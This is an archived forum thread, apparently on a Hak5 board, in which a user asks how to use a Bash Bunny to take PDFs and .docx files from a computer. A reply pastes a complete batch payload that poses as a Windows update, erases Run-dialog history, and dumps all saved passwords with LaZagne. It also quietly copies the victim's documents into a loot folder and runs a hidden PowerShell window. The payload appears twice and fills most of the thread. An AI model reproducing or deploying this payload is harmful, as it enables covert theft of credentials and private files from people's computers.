linkhak Posted February 27, 2018 Share Posted February 27, 2018 Hello Guys! I've just received my Bash Bunny and need some Help. I've updated it already and want to use the Document Exfiltration. Can someone explain it step by step, what I've to do? I want to exfiltrate PDFs and .docx from a computer and/or from a USB stick plugged in a computer. Is this possible? Please HELP Link to comment Share on other sites More sharing options...
m40295 Posted February 27, 2018 Share Posted February 27, 2018 It's a lot easier if you learn the steps yourself , there are many places full of resources YouTube search bash bunny introduction github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/usb_exfiltrator Edit e.cmd @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious REM This executes LaZagne in the current directory and outputs the password file to Loot REM Time and Date is also added setlocal cd /d %~dp0 %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit The e. C MD file can be edited near the bottom to copy what you want edit the X copy and just put your file extension Link to comment Share on other sites More sharing options...
linkhak Posted February 27, 2018 Author Share Posted February 27, 2018 2 hours ago, m40295 said: It's a lot easier if you learn the steps yourself , there are many places full of resources YouTube search bash bunny introduction github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/usb_exfiltrator Edit e.cmd @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious REM This executes LaZagne in the current directory and outputs the password file to Loot REM Time and Date is also added setlocal cd /d %~dp0 %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit The e. C MD file can be edited near the bottom to copy what you want edit the X copy and just put your file extension It’s a bit hard for me to understand Because I’m not a Native American speaker. Ive only found like 2/3 videos for exfiltration. It Would be very nice if you can explain it to me step by step. I would be veruz grateful:-) Link to comment Share on other sites More sharing options...
m40295 Posted February 28, 2018 Share Posted February 28, 2018 Sorry no Maybe someone else can help you but it's a fairly basic payload drag drop modify one or two lines Link to comment Share on other sites More sharing options...
linkhak Posted February 28, 2018 Author Share Posted February 28, 2018 9 hours ago, m40295 said: Sorry no Maybe someone else can help you but it's a fairly basic payload drag drop modify one or two lines What if I give you 10$? i would pay you if it works. Link to comment Share on other sites More sharing options...
m40295 Posted March 1, 2018 Share Posted March 1, 2018 You can offer me a million and I still wouldn't take. What if I offer you some links to do research so you can teach yourself Link to comment Share on other sites More sharing options...
linkhak Posted March 1, 2018 Author Share Posted March 1, 2018 6 hours ago, m40295 said: You can offer me a million and I still wouldn't take. What if I offer you some links to do research so you can teach yourself Okay Deal! Link to comment Share on other sites More sharing options...
C1PH3R Posted March 1, 2018 Share Posted March 1, 2018 Message me in private (on the forum) I will give you some links to read, watch etc. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.